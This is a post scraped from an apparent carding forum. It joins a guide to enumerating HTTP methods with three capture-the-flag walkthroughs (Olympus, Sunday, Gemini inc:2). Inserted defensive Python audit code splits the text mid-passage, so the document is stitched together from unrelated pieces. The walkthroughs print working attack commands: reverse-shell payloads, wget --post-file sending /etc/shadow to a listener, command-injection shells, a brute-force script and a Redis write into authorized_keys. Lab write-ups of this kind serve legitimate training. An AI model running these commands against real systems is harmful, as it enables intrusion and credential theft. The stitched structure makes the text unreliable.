[Guide] Multiple Ways to Detect HTTP Options - Printable Version
Source: Blackhat Carding Forum (https://bhcforums.cc), forum Carders Home, thread /Thread-Guide-Multiple-Ways-to-Detect-HTTP-Options
[Guide] Multiple Ways to Detect HTTP Options - NINZA - 05-14-2020

Hi Friends, today we will walk through the various HTTP protocol methods and the tools used to enumerate the HTTP methods available on a web server. The HTTP protocol comprises a number of methods that can be used not only to gather information from the web server but also to perform specific actions on it. These methods are helpful to web application developers during the deployment and testing stages of a web application. GET and POST are the most well-known methods, used to retrieve and submit information to a web server, respectively. HTTP allows various other methods as well, such as PUT, CONNECT, TRACE, HEAD and DELETE. If the web server is left misconfigured, these methods can be used for malicious purposes and pose a major security risk for the web application, as they could allow an attacker to modify the files stored on the web server.

OPTIONS: The OPTIONS method is used to request the HTTP methods available on a web server.

GET: GET is the most common and widely used method on websites. It is used to retrieve data for a specific resource from the web server. As GET only requests data and does not modify the content of any resource, it is considered safe.

POST: POST requests are used to send (or submit) data to the web server in order to create or update a resource. The information sent is carried in the body of the HTTP request and processed further. An example is the “Contact us” form page on a website: when we fill in the form and submit it, the input data is placed in the request body and sent across to the server.

PUT: The PUT method allows the end user (client) to upload new files to the web server. An attacker can exploit it by uploading malicious files or by using the victim's server as a file repository.
CONNECT: The CONNECT method could allow a client to use the web server as a proxy.

TRACE: This method echoes back to the client the same string that was sent to the server, and is used mainly for debugging purposes.

HEAD: The HEAD method is almost identical to GET, but without the message body in the response. In other words, if the HTTP request GET /products returns a list of products, then HEAD /products triggers a similar request but does not retrieve the list of products.

DELETE: This method enables a client to delete a file on the web server. An attacker can exploit it as a very simple and direct way to deface a web site or to perform a DoS attack.

Now let us use some tools to identify the HTTP methods enabled or supported by the web server.

Metasploit

Metasploit Framework is a well-known platform for developing, testing and executing exploits. It is an open source tool for running various exploits against target machines. Metasploit has built-in auxiliary modules dedicated to scanning HTTP methods. Through the Metasploit framework command line (CLI), we can identify the HTTP options available on the target as follows:

```
use auxiliary/scanner/http/options
set rhosts 192.168.1.109
set rport 80
exploit
```

cURL

cURL is a command line tool to get or send data using URL syntax. It is compatible with various well-known protocols (HTTPS, FTP, SCP, LDAP, Telnet etc.) and offers command line options for performing various tasks (e.g. user authentication, FTP uploading, SSL connections). cURL comes installed by default in most distributions; if it is not installed, it can be installed with the apt-get install curl command.
For more details refer to the URL below: [To see content please register here]

Through the cURL command we can identify the HTTP options available on the target URL as follows:

```
curl -v -X OPTIONS [To see content please register here]
```

The screenshot displays the allowed HTTP methods (GET, HEAD, POST, OPTIONS, TRACE), along with other server-specific information (server response, version details etc.).

Nikto

Nikto is a web server scanner that tests web servers for dangerous files/CGIs, outdated server software and other issues. It performs both generic checks and checks specific to the server type. Through the Nikto command we can identify the HTTP options available on the target as follows:

```
nikto -h 192.168.1.109
```

The screenshot displays the allowed HTTP methods (GET, HEAD, POST, OPTIONS, TRACE), along with other detailed server-specific information (server response, version details etc.).

Nmap

Nmap is a free and open-source security scanner used to discover hosts and services on a network. Another way of checking which HTTP methods are enabled is the Nmap script http-methods.nse, which can be obtained from [To see content please register here]. Let us use the Nmap command to enumerate all of the HTTP methods supported by the web server on the target as follows:

```
nmap --script http-methods --script-args http-methods.test-all='/192.168.1.109' 192.168.1.109
```

The screenshot displays the allowed HTTP methods (GET, HEAD, POST, OPTIONS, TRACE) and highlights the potentially risky methods among them (i.e. TRACE).

Netcat

Netcat is a utility with the capability to read and write data across TCP and UDP network connections, along with features such as built-in port scanning, network debugging and file transfer.
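Whichever tool sends it, the request behind the cURL, Nikto and Nmap checks above is a single OPTIONS request, and the answer is the Allow header. As an added example (not code from the original post), a small Python audit that builds that request, parses a raw response and flags the methods the guide calls dangerous; the host, port and the sample response are constructed:

```python
"""Audit the HTTP methods a server advertises in response to OPTIONS.

Added example, not code from the original post. RISKY mirrors the methods
the guide singles out; SAMPLE_RESPONSE is a constructed response shaped
like the one in the guide's screenshots.
"""
import http.client
from typing import Dict, Set

# Methods the guide flags as dangerous when a misconfigured server exposes them.
RISKY = {"PUT", "DELETE", "TRACE", "CONNECT"}
BENIGN = {"GET", "HEAD", "POST", "OPTIONS"}


def raw_options_request(host: str, path: str = "/") -> bytes:
    """The bytes the manual netcat step types: request line, Host, blank line."""
    return f"OPTIONS {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def parse_allow(value: str) -> Set[str]:
    """Split an Allow header such as 'GET, HEAD, POST, OPTIONS, TRACE'."""
    return {m.strip().upper() for m in value.split(",") if m.strip()}


def parse_options_response(raw: bytes) -> Dict[str, object]:
    """Parse a raw HTTP response head into status, Server and allowed methods."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status_line = lines[0].split(" ", 2)
    status = int(status_line[1]) if len(status_line) > 1 and status_line[1].isdigit() else 0
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, val = line.partition(":")
        if sep:
            headers[name.strip().lower()] = val.strip()
    return {
        "status": status,
        "server": headers.get("server", ""),
        "allowed": parse_allow(headers.get("allow", "")),
    }


def assess(allowed: Set[str]) -> Dict[str, Set[str]]:
    """Split the advertised methods into the guide's risky set and the rest."""
    return {
        "risky": allowed & RISKY,
        "benign": allowed & BENIGN,
        "other": allowed - RISKY - BENIGN,
    }


def probe(host: str, port: int = 80, path: str = "/", timeout: float = 5.0) -> Dict[str, object]:
    """Send a live OPTIONS request (what curl -X OPTIONS does) and parse the reply."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", path, headers={"Host": host})
        resp = conn.getresponse()
        return {
            "status": resp.status,
            "server": resp.getheader("Server") or "",
            "allowed": parse_allow(resp.getheader("Allow") or ""),
        }
    finally:
        conn.close()


# Constructed sample: the shape of the reply the guide's screenshots show.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Thu, 14 May 2020 10:00:00 GMT\r\n"
    b"Server: Apache/2.2.21 (Unix)\r\n"
    b"Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"
    b"Content-Length: 0\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    parsed = parse_options_response(SAMPLE_RESPONSE)
    verdict = assess(parsed["allowed"])
    print("server :", parsed["server"])
    print("allowed:", sorted(parsed["allowed"]))
    print("risky  :", sorted(verdict["risky"]))
```

On Apache, `TraceEnable Off` removes TRACE from the advertised set; re-running the probe after the change is the quickest way to confirm the fix took effect.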
Through the Netcat command we can identify the HTTP options available on the target as follows:

```
nc 192.168.1.109 80
```

Press enter and the connection waits for input on the command line. Enter the server details as follows (highlighted in red in the screenshot):

```
OPTIONS [To see content please register here] / HTTP/1.0
host:192.168.1.109
```

The screenshot displays the allowed HTTP methods (GET, HEAD, POST, OPTIONS, TRACE), along with other server-specific information (server response, version details etc.).

Burp Suite

Burp Suite is a platform for performing various kinds of security testing of web applications, from initial mapping and analysis to identifying and exploiting application vulnerabilities. As we know, the HTTP OPTIONS method provides the most effective way to discover the different methods allowed on an HTTP server. So let us capture the URL request in the Burp Suite GUI and change the HTTP method in the Request section to OPTIONS, as seen below. As shown, the response from the web server not only displays the list of allowed HTTP methods but also reveals the server version details (e.g. Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL 1.0.0/k DAV/2 PHP/5.4.3).

Today we are going to solve another CTF challenge, “Olympus”. Olympus is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Easy
Task: Find the user.txt and root.txt files.
Note: Since these labs are available online, they have static IPs. The IP of Olympus is 10.10.10.83.

Walkthrough

Let's start off with our basic nmap command to find out the open ports and services.
```
nmap -A 10.10.10.83
```

From the nmap scan we found that port 22 (SSH) is filtered, but port 2222 is open for SSH instead. Moreover, port 53 is open for DNS, where it grabbed the banner “Bind”, and port 80 is open for an Apache HTTP server. So first, let's navigate to port 80 in the web browser.

After exploring the target IP in the web browser, we were welcomed by a picture of Zeus, as shown in the image above. Unfortunately, we were unable to find any remarkable clue here, so we decided to run Nikto to scan for possible vulnerabilities:

```
nikto -h [To see content please register here]
```

Scanning with Nikto gave us a clue to move forward: the uncommon header ‘xdebug’. Searching for the keyword ‘xdebug’ on Google gave us a result about the ‘xdebug’ command execution exploit module for Metasploit. So load Metasploit in your terminal and use the following commands:

```
msf > use exploit/unix/http/xdebug_unauth_exec
msf (exploit/unix/http/xdebug_unauth_exec) > set rhost 10.10.10.83
msf (exploit/unix/http/xdebug_unauth_exec) > set lhost 10.10.14.13
msf (exploit/unix/http/xdebug_unauth_exec) > exploit
```

Boom!! We have got a meterpreter session on the target machine. Exploring the directories further, we noticed a directory /zeus with a subdirectory /airgeddon, as you can see in the image below. Then inside the /airgeddon directory we opened its subdirectory /captured, which contains a file captured.cap.
```
ls
cd /home
ls
cd zeus
ls
```

It could be another clue, so we downloaded this file to our Kali desktop, as you can see in the image below.

```
cd airgeddon
ls
cat pindb_checksum.txt
cd captured
ls
download captured.cap /root/Desktop/
cat papyrus.txt
```

After downloading captured.cap, we need to analyse it. When we open the file, it is a Wireshark pcap file, and by following the first packet we noticed the SSID Too_clOse_to_th3_Sun, as shown in the image. This can probably be used as a password.

Now crack captured.cap using aircrack-ng with the following command:

```
aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt
```

After a few minutes we found the key: flightoficarus, as shown in the image below.

We thought icarus could be a username too, because when we searched “Too close to the Sun” on Google earlier, it showed the wiki page of Icarus. Therefore the following combination of credentials can be used for SSH login via port 2222:

```
icarus:Too_clOse_to_th3_Sun
ssh [email protected] -p 2222
```

After successfully logging in over SSH and navigating further, we acquired a file “help_of_the_gods.txt”. Reading the file reveals a domain name, ctfolympus.htb, as shown in the image below.

We thought of trying a DNS zone transfer, since dig uses the AXFR response to retrieve the zone information:

```
dig axfr @10.10.10.83 ctfolympus.htb
```

From the result, we figured that prometheus could be another username and St34l_th3_F1re! the corresponding password. There is also a series of seemingly random port numbers, 3456 8234 62431, which led us to think of port knocking, which can change the state of SSH port 22 from filtered to open.
We knocked these ports by executing the following command:

```
knock -v 10.10.10.83 3456 8234 62431
```

After knocking, we confirmed the state of SSH port 22 with an nmap scan. Here we succeeded in opening the SSH port.

```
nmap -p22 10.10.10.83
```

Now log in to SSH on port 22 using the credentials given below:

```
Prometheus: St34l_th3_F1re!
```

Here!! We have found and read user.txt. Yuppie!! We have completed our first task; moving on to the second task.

Then, using the id command, we noticed that prometheus is in the docker group. Let's have a look at the docker images and docker ps output, as shown in the image below.

```
docker images
docker ps
```

By executing the above commands we notice there is a docker image “olympia”, so we can start a bash shell from it with the following command to escalate to root privileges. Time to get root.txt!! After looking for information on how to exploit this, we find that we can access the host filesystem as root by mounting it into the container with the following command:

```
docker run -v /:/root -i -t olympia /bin/bash
```

Booyah!! We have found root.txt, and from the image below you can see we have obtained the value of root.txt.

Hello friends!! Today we are going to solve another CTF challenge, “Sunday”. Sunday is a retired vulnerable lab presented by Hack the Box for online penetration practice according to your experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Easy
Task: Find the user.txt and root.txt files on the victim's machine.

Penetration Methodology
Scanning

Since these labs are available online, they have static IPs. The IP of Sunday is 10.10.10.76. Let's start off by scanning the network to find our target.

```
nmap -p- -A 10.10.10.76 --open
```

Enumeration

Here we notice a very interesting result from the nmap scan: port 79 is open for Sun Solaris fingerd. So I Googled for an exploit and found the Metasploit module “Finger Service User Enumerator”. I then loaded the Metasploit framework to identify valid users through the finger service, using the following module:

```
use auxiliary/scanner/finger/finger_users
msf auxiliary(scanner/finger/finger_users) > set rhosts 10.10.10.76
msf auxiliary(scanner/finger/finger_users) > set users_file /root/pentest/SecLists/Usernames/Names/names.txt
msf auxiliary(scanner/finger/finger_users) > exploit
```

Exploit

It revealed a number of usernames, so now make a dictionary of the obtained usernames and passwords to use in an SSH login brute force. Here we used “patator” to brute-force the SSH login on port 22022 with the following command:

```
patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=probable-v2-top1575.txt persistent=0
```

Finally, we found the password of the user “sunny”.

Password: sunday

But when we tried to log in over SSH using the above credentials, it gave a “no matching key exchange method found” error, together with a hint, and dropped the connection.
With a little more research, I added the following key exchange option to connect over SSH and luckily obtained a tty shell:

```
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected] -p22022
sudo -l
```

Then I checked the sudo rights of user sunny and noticed he can run /root/troll as root without a password. Lol!! Executing /root/troll was a troll. Next, I checked the available files and directories, and luckily found shadow.backup inside the /backup directory. Inside shadow.backup I found hashes for the users sammy and sunny.

So we tried to crack these hashes using John the Ripper, and fortunately obtained the plaintext password “cooldude!” of user sammy.

Privilege Escalation Techniques

There are multiple ways to escalate to root privileges in this lab; in this article we have applied four ways to escalate to root and get the root.txt file. Now let's switch from sunny to sammy and figure out his assigned sudo permissions.

```
sudo -l
```

Great!! We found that he has the right to download any file as root using the wget command. Now let's also enumerate system binaries that have the SUID bit set.

```
find / -perm -u=s -type f 2>/dev/null
```

There are many binaries with the SUID bit set; let's exploit some of them to gain root privileges.

Method 1

Now let's generate a payload using msfvenom with the following command, and run a PHP server to transfer the file.

```
msfvenom -p solaris/x86/shell_reverse_tcp lhost=10.10.14.6 lport=5555 -f elf > /root/Desktop/raj.elf
php -S 0.0.0.0:80
```

Let's download the above raj.elf with wget from inside the /tmp directory and overwrite the rsh binary with it. Then start a netcat listener in a new terminal to catch the root tty shell.
```
cd /tmp
sudo /usr/bin/wget 10.10.14.6/raj.elf -O /usr/bin/rsh
/usr/bin/rsh
```

Now when you execute the /usr/bin/rsh command, you get a shell with root privileges, as shown below in the image.

```
id
```

As you can observe, euid=0 (root), so now let's grab the root.txt file.

```
cd /root
ls
cat root.txt
```

Method 2

The pfexec program is used to execute commands with the attributes specified by the user's profiles in the exec_attr(4) database. It is invoked by the profile shells pfsh, pfcsh and pfksh, which are linked to the Bourne shell, C shell and Korn shell, respectively. From [To see content please register here]

Now execute the following commands to obtain a root shell:

```
pfexec bash
id
cd /root
ls
cat root.txt
```

So, in this lab challenge we obtained the root.txt file through four types of privilege escalation, and there might be other ways to get root.txt as well. Try it yourself!! Happy Hacking

Method 3

As we know, sudo permission is available for wget, so we can use its --post-file option to send the contents of any file, for example /etc/passwd or /etc/shadow. Therefore we execute the following command to post the shadow file's contents to our local listening machine:

```
sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.6
```

In the terminal where the netcat listener is running, you will receive the contents of the shadow file.

```
nc -lvp 80
```

From the given image, you can observe that we have obtained the hash of the root user. You can either crack the hash or modify it. So we copied the above content into a text file so that we can replace the hash of user root with the hash of user sunny.
In the image below, you can observe that we have modified the root hash by copying user sunny's hash; as we know, the password of sunny is “sunday”, so the new password for root will be sunday. Now name the file shadow and get ready to transfer it.

Now download the modified shadow file to its original path, /etc/shadow, so that it overwrites the original shadow file.

```
sudo /usr/bin/wget 10.10.14.6/shadow -O /etc/shadow
```

Method 4

Similarly, we can also post the contents of root.txt directly to the listening machine.

```
sudo /usr/bin/wget --post-file=/root/root.txt 10.10.14.6
```

In the terminal where the netcat listener is running, you will receive the contents of root.txt, which is the root flag.

```
nc -lvp 80
```

From the given image, you can observe that we have obtained the value of root.txt.

Hello Friends!! Today we are going to breach a new VM lab, “Gemini inc:2”, of the VulnHub series. Before moving ahead, you can also take a look at [To see content please register here], which we solved earlier. Gemini Inc has contacted you to perform a penetration test on one of their internal systems. This system has a web application that is meant for employees to export their profile to a PDF. Identify any vulnerabilities possible with the goal of complete system compromise with root privilege. To demonstrate the level of access obtained, please provide the content of flag.txt located in the root directory as proof. You can download it from here: [To see content please register here]

Penetration Methodologies:
The first step, as always, is running netdiscover on the VM to grab the IP address. In my case the IP was 192.168.1.103.

Once the IP was found, we ran an aggressive nmap scan to enumerate all the open ports.

```
nmap -A 192.168.1.103
```

From the nmap scan result, we found port 80 open for the HTTP service, so let's navigate to port 80 in the browser. It puts up a Welcome Guest page for logging in to the web application.

When we didn't find any remarkable clue on its home page, without wasting much time I used dirb for web directory enumeration and ran the following command for files with the .php extension:

```
dirb [To see content please register here] -X .php
```

Hmmm! I fetched some interesting URLs; let's inspect them one by one.

So next we navigate to the URL [To see content please register here] and observe the Activation Form, which requires a User ID and Activation Code to activate an account. Next, we navigate to the URL [To see content please register here] and observe the Register Form to register a new account. So I registered an account as “raaj”.

By registering as raaj, a new profile was generated with User ID 14, as highlighted in the image below, but we still need the 6-digit activation code to activate the “raaj” account. To obtain an activation code, I tried all possible hit-and-try methods, but all were a waste of effort; at last I found this [To see content please register here], where I found a bash script for the activation code. I copied the following code into a text file and saved it as gemini.sh on the Desktop.
Script Source: [To see content please register here]

```bash
#!/bin/bash
# Script as posted, with comments added: tries every 6-digit activation code
# for user id 14 until the server stops answering 403.
url="http://192.168.1.103/activate.php"
for key in {000000..999999}; do
    # Fetch a fresh session cookie and the CSRF token embedded in the form.
    token=$(curl -s -c cookie $url | awk -F 'value=' '/token/ {print $2}' | cut -d "'" -f2)
    # Submit the guess; -w %{http_code} appends the status code to the output.
    resp=$(curl -s -w %{http_code} -b cookie --data "userid=14&activation_code=$key&token=${token}" $url | tail -n 1 | cut -d ">" -f2)
    if [ "$resp" -ne 403 ]; then
        echo "Key = "$key
        break
    fi
done
```

Finally, run the bash script with the following command, with user_id “14”, to obtain the 6-digit activation code for user “raaj”:

```
bash gemini.sh
```

Awesome!! So we cracked the activation code “000511” for user “raaj”.

Now submit your user_id and activation code to activate the account. In my case, my user_id is 14 and the activation code is 000511 for user “raaj”.

Great, I got logged in as raaj, and then I explored the User List, where I found all the activated accounts of other users.

Then I checked the profile of 9emin1, whose actual name is Gemini, and found that it is an administrator account.

Then I checked its source code, where luckily I found the password hashes. I copied the hash value to decrypt it.

Then I used an online MD5 decryption service to decrypt the hash ‘edbd1887e772e13c251f688a5f10c1ffbb67960d’, and finally we obtained the plaintext password “secretpassword”.

Then we log in to the admin panel with the following credentials:

```
Username: Gemini
Password: secretpassword
```

Then navigate to Admin Panel -> Execute Command. But it shows nothing.
At that moment I used Burp Suite to intercept the HTTP request and then sent the intercepted request to the Repeater to confirm what kind of response it generates. Looking at the HTTP traffic, I perceived a 403 IP NOT ALLOWED response. Hence the web application is running behind some kind of firewall.

Then I Googled how to bypass a WAF through a Burp Suite extension and found a [To see content please register here] for “Bypass WAF”. This extension adds headers to all Burp requests to bypass some WAF products. The following headers are automatically added to all requests:
Execute Command

Finally, we got the Execute Command page, and it appears to be vulnerable to RCE, where we can run arbitrary system commands. Therefore we tried some malicious input such as “;ls”, but again it showed nothing.

Here we need to set the X-Forwarded-For: 127.0.0.1 header for each page; to do so, follow the steps below:
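The 403 IP NOT ALLOWED check is defeated because the application decides the client's address from X-Forwarded-For, a header any client can set. As an added example (not the lab's or the post's code), the weak lookup beside a version that only believes the header when the TCP peer is one of our own proxies; the trusted-proxy range, the admin allowlist and the sample requests are constructed:

```python
"""Deciding the client IP behind a proxy: the check the Gemini box got
wrong, and a safer version.

Added example, not the lab's or the post's code. ADMIN_ALLOWLIST and
TRUSTED_PROXIES are constructed values.
"""
import ipaddress
from typing import Dict

# Addresses allowed to reach the admin "Execute Command" page (constructed).
ADMIN_ALLOWLIST = {"127.0.0.1"}

# Reverse proxies we actually operate. Only their X-Forwarded-For is believed (constructed).
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]


def _header(headers: Dict[str, str], name: str) -> str:
    """Case-insensitive header lookup."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return ""


def client_ip_naive(remote_addr: str, headers: Dict[str, str]) -> str:
    """Weak version: believes X-Forwarded-For from anyone.

    A request carrying 'X-Forwarded-For: 127.0.0.1' is treated as localhost,
    which is exactly the bypass the Burp extension performs.
    """
    xff = _header(headers, "X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def _is_trusted_proxy(addr: ipaddress._BaseAddress) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip_hardened(remote_addr: str, headers: Dict[str, str]) -> str:
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy, and
    then walk the list from the right, skipping our own proxies: the first
    address not ours is the client. The leftmost value is client-controlled."""
    peer = ipaddress.ip_address(remote_addr)
    if not _is_trusted_proxy(peer):
        return remote_addr                      # direct connection: the peer is the client
    hops = [h.strip() for h in _header(headers, "X-Forwarded-For").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr                  # garbage in the header: fall back to the peer
        if not _is_trusted_proxy(addr):
            return hop
    return remote_addr                          # header empty or only our proxies


def admin_allowed(ip: str) -> bool:
    """The allowlist check in front of the Execute Command page."""
    return ip in ADMIN_ALLOWLIST


if __name__ == "__main__":
    spoofed = {"X-Forwarded-For": "127.0.0.1"}
    print("naive   :", admin_allowed(client_ip_naive("203.0.113.5", spoofed)))     # True
    print("hardened:", admin_allowed(client_ip_hardened("203.0.113.5", spoofed)))  # False
```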
Now we can easily exploit the RCE vulnerability by uploading our php-reverse-shell. Traverse to the directory /usr/share/webshells/php/php-reverse-shell.php; here I modified the IP to 192.168.1.106 [Kali IP] and the listening port to 1234.

Hey Guys!! You need to pay attention here. NOTE: Be careful while executing any command that contains arguments, because here the command is executed with arguments but without spaces. So once again I took the help of Google and found a [To see content please register here] for sending a command with arguments and without spaces.

```
IFS=:;a=wget:192.168.1.106/revshell.php:-O/tmp/revshell.php;$a
```

Now type the following command to execute the uploaded backdoor file, but before executing it, do not forget to start the netcat listener.

```
IFS=:;a=php:/tmp/revshell.php;$a
```

```
nc -lvp 1234
```

Now execute the following commands to spawn a proper tty shell on the target machine.

```
python -c 'import pty;pty.spawn("/bin/bash")'
lsb_release -a
uname -a
```

Now let's go for post-exploitation to obtain the root.txt file, and for that we need to escalate to root privileges. First we traversed to the /home directory but didn't find any valuable file, so we tried to enumerate running services with the following command.

```
netstat -antp
```

By executing the above command we enumerated the running services and found that port 6379 is used by Redis. As we know, Redis is a key-value store, often referred to as a NoSQL database. The essence of a key-value store is the ability to store some data, called a value, inside a key. This data can later be retrieved only if we know the exact key used to store it.
From source: [To see content please register here]

Therefore, from its configuration file we retrieved the auth key “8a7b86a2cd89d96dfcc125ebcc0535e6” so that we can extract information.

```
cd /etc/redis
ls
cat 6379.conf | grep requirepass
redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 ping
```

Great!! We got a PONG response; now let's move ahead to extract information from it.

We abuse Redis by writing a malicious RSA key pair to disk; for that, follow the steps given below and execute the commands as described.
```
ssh-keygen
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > public.txt
cat public.txt | redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 -x set pub
redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 config set dir "/root/.ssh/"
redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 config set dbfilename authorized_keys
redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 save
```

Authenticate via SSH:

```
cd .ssh
ssh [email protected]
```

Boom!!! We got root access; now let's grab the flag.txt file to finish this challenge completely.

```
ls
cat flag.txt
```

Yuppie!!! Happy Hacking
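The chain above works because CONFIG SET is still reachable once the password is known, so dir and dbfilename can be pointed at /root/.ssh and SAVE writes the dump there with the service's own privileges. As an added example (not the lab's or the post's code), a small auditor that reads a redis.conf and reports the settings that leave this open; both sample configurations are constructed and the password value is a placeholder. It cannot see which user the service runs as, which matters just as much here:

```python
"""Audit a redis.conf for the settings the dump-file abuse relies on.

Added example, not the lab's or the post's code. WEAK_CONF and
HARDENED_CONF are constructed; the requirepass value is a placeholder.
"""
from typing import Dict, List

LOOPBACK = {"127.0.0.1", "::1", "-::1"}


def parse_redis_conf(text: str) -> Dict[str, List[str]]:
    """Map each directive (lower-cased) to every value it was given, in order."""
    conf: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(parts[0].lower(), []).append(value)
    return conf


def renamed_commands(conf: Dict[str, List[str]]) -> Dict[str, str]:
    """Turn 'rename-command CONFIG ""' lines into {COMMAND: new_name}; "" means disabled."""
    out: Dict[str, str] = {}
    for value in conf.get("rename-command", []):
        parts = value.split(None, 1)
        if len(parts) == 2:
            out[parts[0].upper()] = parts[1].strip().strip('"')
    return out


def audit(text: str) -> List[str]:
    """Return one finding per setting that leaves the dir/dbfilename trick open."""
    conf = parse_redis_conf(text)
    renamed = renamed_commands(conf)
    findings: List[str] = []
    if not any(conf.get("requirepass", [])):
        findings.append("no requirepass: anyone who reaches the port gets full access")
    bound = {tok for v in conf.get("bind", []) for tok in v.split()}
    if not bound or not bound <= LOOPBACK:
        findings.append("bind is not limited to loopback")
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode is off")
    if "CONFIG" not in renamed:
        findings.append("CONFIG not renamed or disabled: dir and dbfilename can be retargeted at runtime")
    return findings


# Constructed: the shape of the lab's 6379.conf, a password and otherwise defaults.
WEAK_CONF = """\
port 6379
dir /var/lib/redis
dbfilename dump.rdb
requirepass constructed-placeholder-password
"""

# Constructed: same service with the runtime retargeting closed off.
HARDENED_CONF = """\
port 6379
bind 127.0.0.1 ::1
protected-mode yes
dir /var/lib/redis
dbfilename dump.rdb
requirepass constructed-placeholder-password
rename-command CONFIG ""
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}: {audit(text) or ['no findings']}")
```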